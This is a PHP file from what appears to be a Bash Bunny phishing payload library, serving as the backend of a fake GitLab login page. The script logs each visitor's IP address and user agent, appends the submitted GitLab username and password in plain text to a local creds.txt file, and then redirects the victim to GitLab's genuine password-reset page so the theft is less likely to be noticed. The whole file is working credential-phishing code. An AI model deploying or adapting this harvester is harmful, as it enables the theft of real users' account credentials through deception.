Files
bashbunny-payloads/payloads/library/phishing/Triggered_Bunny/sites/gitlab/login.php
2022-12-25 23:02:06 +05:30

29 lines
742 B
PHP

<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Gitlab Username: " . $_POST['login'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://gitlab.com/users/password/new');
exit();
?>